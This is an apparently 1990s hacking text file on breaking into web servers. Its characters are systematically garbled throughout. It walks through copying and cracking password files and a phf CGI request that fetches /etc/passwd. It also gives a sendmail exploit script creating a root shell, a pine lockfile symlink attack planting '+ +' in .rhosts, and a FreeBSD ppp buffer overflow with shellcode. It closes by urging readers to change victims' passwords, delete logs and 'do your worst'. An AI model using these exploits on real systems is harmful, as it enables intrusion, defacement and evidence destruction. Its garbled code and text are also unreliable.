Crackzter - Hacking Websites

Author : Crackzter
Well Psychotic wrote one of the most helpful unix text files in cyberspace but with the mail that
we
recieve after the release of our famous !" page #nix $ible we realise that unix isn%t for
everyboy so
we ecie that we shoul write on another aspect of hacking&&&&& 'irtual Circuit an Psychotic is
prou to
release( )Hacking Webpages With a few *ther +echni,ues&) We will iscuss a few various ways
of hacking
webpages an getting root& We are also going to interview an ,uestion other -.A/ hackers on
the
sub0ects&
1etting the Passwor 2ile +hrough 2+P
*k well one of the easiest ways of getting superuser access is through anonymous ftp access
into a
webpage& 2irst you nee learn a little about the passwor file&&&
root:#ser:3$g:4n5H15:4453:56:7uperuser
+om8ones:p9:;h6tiC:455<:56:+om 8ones(:=usr=people=tom0ones:=bin=csh
$$ob:.#y9>AAtv5A:445<:56:$illy $ob:=usr=people=bbob:=bin=csh
+his is an example of a regular encrypte passwor file& +he 7uperuser is the part that gives
you root&
+hat%s the main part of the file&
root:x:6:4:7uperuser:=:
ftp:x:565:465:Anonymous ftp:=u4=ftp:
ftpamin:x:56!:465:ftp Aministrator:=u4=ftp
+his is another example of a passwor file( only this one has one little ifference( it%s shaowe&
7haowe passwor files on%t let you view or copy the actual encrypte passwor& +his causes
problems
for the passwor cracker an ictionary maker;both explaine later in the text?& $elow is another
example of a shaowe passwor file:
root:x:6:4:6666-Amin;6666?:=:=usr=bin=csh
aemon:x:4:4:6666-Amin;6666?:=:
bin:x:5:5:6666-Amin;6666?:=usr=bin:
sys:x:!:!:6666-Amin;6666?:=:
am:x:@:@:6666-Amin;6666?:=var=am:
lp:x:34:A:6666-lp;6666?:=usr=spool=lp:
smtp:x:6:6:mail aemon user:=:
uucp:x:9:9:6666-uucp;6666?:=usr=lib=uucp:
nuucp:x:<:<:6666-uucp;6666?:=var=spool=uucppublic:=usr=lib=uucp=uucico
listen:x:!3:@:Betwork Amin:=usr=net=nls:
noboy:x:"6664:"6664:ui no boy:=:
noaccess:x:"6665:"6665:ui no access:=:
webmastr:x:9!:9!:WWW Amin:=export=home=webmastr:=usr=bin=csh
pin@geo:x:99:99:PinPaper Amin:=export=home=webmastr=new=greg:=test=pin@geo:=bin=false
ftp:x:9@:9@:Anonymous 2+P:=export=home=anonCftp:=bin=false
7haowe passwor files have an )x) in the place of a passwor or sometimes they are
isguise as an
D as well&
Bow that you know a little more about what the actual passwor file looks like you shoul be
able to
ientify a normal encrypte pw from a shaowe pw file& We can now go on to talk about how to
crack it&
Cracking a passwor file isn%t as complicate as it woul seem( although the files vary from
system to
system& 4&+he first step that you woul take is to ownloa or copy the file& 5& +he secon step
is to fin
a passwor cracker an a ictionary maker& Although it%s nearly impossible to fin a goo
cracker there
are a few ok ones out there& E recomen that you look for Cracker 8ack( 8ohn the -ipper( $rute
2orce
Cracker( or 8ack the -ipper& Bow for a ictionary maker or a ictionary file&&& When you start a
cracking
prog you will be aske to fin the the passwor file& +hat%s where a ictionary maker comes in&
:ou can
ownloa one from nearly every hacker page on the net& A ictionary maker fins all the
possible letter
combinations with the alphabet that you choose;A7CEE( caps( lowercase( an numeric letters
may also be
ae? & We will be releasing our paswor file to the public soon( it will be calle( Psychotic
Cany( )+he
Perfect Frug&) As far as we know it will be one of the largest in circulation& !& :ou then start up
the
cracker an follow the irections that it gives you&
+he PH2 +echni,ue
Well E wasn%t sure if E shoul inclue this section ue to the fact that everyboy alreay knows it
an
most servers have alreay foun out about the bug an fixe it& $ut since E have been aske
,uestions
about the phf E ecie to inclue it&
+he phf techni,ue is by far the easiest way of getting a passwor file;although it oesn%t work
<9G of the
time?& $ut to o the phf all you o is open a browser an type in the following link:
http:==webpageCgoesChere=cgi-bin=phfHIaliasJxG6a=bin=catG56=etc=passw
:ou replace the webpageCgoesChere with the omain& 7o if you were trying to get the pw file for
www&webpage&com you woul type:
http:==www&webpage&com=cgi-bin=phfHIaliasJxG6a=bin=catG56=etc=passw
an that%s itK :ou 0ust sit back an copy the file;if it works?&
+elnet an .xploits
Well exploits are the best way of hacking webpages but they are also more complicate then
hacking
through ftp or using the phf& $efore you can setup an exploit you must first have a telnet proggie(
there
are many ifferent clients you can 0ust o a netsearch an fin everything you nee&
EtLs best to get an account with your target;if possible? an view the glitches from the insie out&
.xploits
expose errors or bugs in systems an usually allow you to gain root access& +here are many
ifferent
exploits aroun an you can view each seperately& ELm going to list a few below but the list of
exploits is
enless&
+his exploit is known as 7enmail v&A&A&@
Et creates a sui program =tmp=x that calls shell as root& +his is how you set it up:
cat MM C.*2C N=tmp=x&c
Oefine -#B )=bin=ksh)
Oinclue
main;?
P
execl;-#B(-#B(B#//?Q
R
C.*2C
O
cat MM C.*2C N=tmp=spawnfish&c
main;?
P
execl;)=usr=lib=senmail)()=tmp=smtp)(6?Q
R
C.*2C
O
cat MM C.*2C N=tmp=smtp&c
main;?
P
setui;6?Q setgi;6?Q
system;)chown root =tmp=x Qchmo @399 =tmp=x)?Q
R
C.*2C
O
O
gcc -* -o =tmp=x =tmp=x&c
gcc -*! -o =tmp=spawnfish =tmp=spawnfish&c
gcc -*! -o =tmp=smtp =tmp=smtp&c
O
=tmp=spawnfish
kill -H#P S=usr=ucb=ps -axTgrep =tmp=smtpTgrep -v grepTse s=)U VD)== Tcut -) ) -f4S
rm =tmp=spawnfish&c =tmp=spawnfish =tmp=smtp&c =tmp=smtp =tmp=x&c
sleep 9
if U -u =tmp=x V Q then
echo )leet&&&)
=tmp=x
fi
an now on to another exploit& ELm going to isplay the pine exploit through linux& $y watching
the
process table with ps to see which users are running PEB.( one can then o an ls in =tmp= to
gather the
lockfile names for each user& Watching the process table once again will now reveal when each
user ,uits
PEB. or runs out of unrea messages in their EB$*>( effectively eleting the respective lockfile&
Creating a symbolic link from =tmp=&hamorsClockfile to Whamors=&rhosts;for a generic example?
will
cause PEB. to create Whamors=&rhosts as a """ file with PEB.%s process i as its contents& *ne
may now
simply o an echo )X X) N =tmp=&hamorsClockfile( then rm =tmp=&hamorsClockfile&
+his was writen by 7ean $& HamorY2or this example( hamors is the victim while catluvr is the
attacker:
hamors ;54 4<:6@? litterbox:WN pine
catluvr ;" 4<:6"? litterbox:WN ps -aux T grep pine
catluvr 43!< 6&6 4&A 466 !9" pp! 7 4<:63 6:66 grep pine
hamors 43!5 6&A 9&3 5@< 446@ pp5 7 4<:69 6:66 pine
catluvr ;3 4<:63? litterbox:WN ls -al =tmp= T grep hamors
- -rw-rw-rw- 4 hamors elite @ Aug 5" 4<:69 &!65&f9a@
catluvr ;A 4<:63? litterbox:WN ps -aux T grep pine
catluvr 43@@ 6&6 4&A 466 !9" pp! 7 4<:6A 6:66 grep pine
catluvr ;< 4<:6<? litterbox:WN ln -s =home=hamors=&rhosts =tmp=&!65&f9a@
hamors ;5! 4<:6<? litterbox:WN pine
catluvr ;44 4<:46? litterbox:WN ps -aux T grep pine
catluvr 439< 6&6 4&A 466 !9" pp! 7 4<:44 6:66 grep pine
hamors 439" 5&3 9&4 55" <<5 pp5 7 4<:46 6:66 pine
catluvr ;45 4<:44? litterbox:WN echo )X X) N =tmp=&!65&f9a@
catluvr ;4! 4<:45? litterbox:WN cat =tmp=&!65&f9a@
X X
catluvr ;4@ 4<:45? litterbox:WN rm =tmp=&!65&f9a@
catluvr ;49 4<:4@? litterbox:WN rlogin litterbox&org -l hamors
now on to another one( this will be the last one that ELm going to show& .xploitation script for the
ppp
vulnerbility as escribe by no one to ate( this is B*+ 2ree$7F-7A-<":49& Works on 2ree$7F
as teste&
Zess with the numbers if it oesnt work& +his is how you set it up:
v
Oinclue
Oinclue
Oinclue
Oefine $#22.-C7E[. 49" =D size of the bufer to overflow D=
Oefine *227.+ -5<6 =D number of bytes to 0ump after the start
of the buffer D=
long getCesp;voi? P CCasmCC;)movl Gesp(Geax\n)?Q R
main;int argc( char DargvUV?
P
char Dbuf J B#//Q
unsigne long DarCptr J B#//Q
char Dptr J B#//Q
char execshellUV J
)\xeb\x5!\x9e\xA\x4e\xA<\x9e\x6b\x!4\x5\xA<\x9"\x63\xA<\x9"\x6f) =D 4" bytes D=
)\xA<\x9"\x4@\xAA\x9"\x4<\x!4\xc6\xb6\x!b\xA\x@e\x6b\xA<\xca\x95) =D 4" bytes D=
)\x94\x9!\x96\xeb\x4A\xeA\xA\xff\xff\xff=bin=sh\x64\x64\x64\x64) =D 56 bytes D=
)\x65\x65\x65\x65\x6!\x6!\x6!\x6!\x<a\x6@\x6@\x6@\x6@\x63\x6@)Q =D 49 bytes( 93 total
D=
int i(0Q
buf J malloc;@6<"?Q
=D fill start of bufer with nops D=
i J $#22.-C7E[.-strlen;execshell?Q
memset;buf( 6x<6( i?Q
ptr J buf X iQ
=D place exploit coe into the buffer D=
for;i J 6Q i M strlen;execshell?Q iXX?
DptrXX J execshellUiVQ
arCptr J ;long D?ptrQ
for;iJ6Qi M ;46@=@?Q iXX?
DarCptrXX J getCesp;? X *227.+Q
ptr J ;char D?arCptrQ
Dptr J 6Q
setenv;)H*Z.)( buf( 4?Q
execl;)=usr=sbin=ppp)( )ppp)( B#//?Q
R
Bow that youLve gotten root )whatLs nextH) Well the choice is up to you but E woul recommen
changing
the passwor before you elete or change anything& +o change their passwor all you have to
o is login
via telnet an login with your new account& +hen you 0ust type: passw an it will ask you for the
ol
passwor first followe by the new one& Bow only you will have the new pw an that shoul last
for a while
you can now uploa you pages( elete all the logs an 0ust plain o your worst8 Psychotic writes
our own
exploits an we will be releasing them soon( so keep your eyes open for them& We recommen
that if
you are serious about learing ethnical hacking that you ownloa our #nix $ible&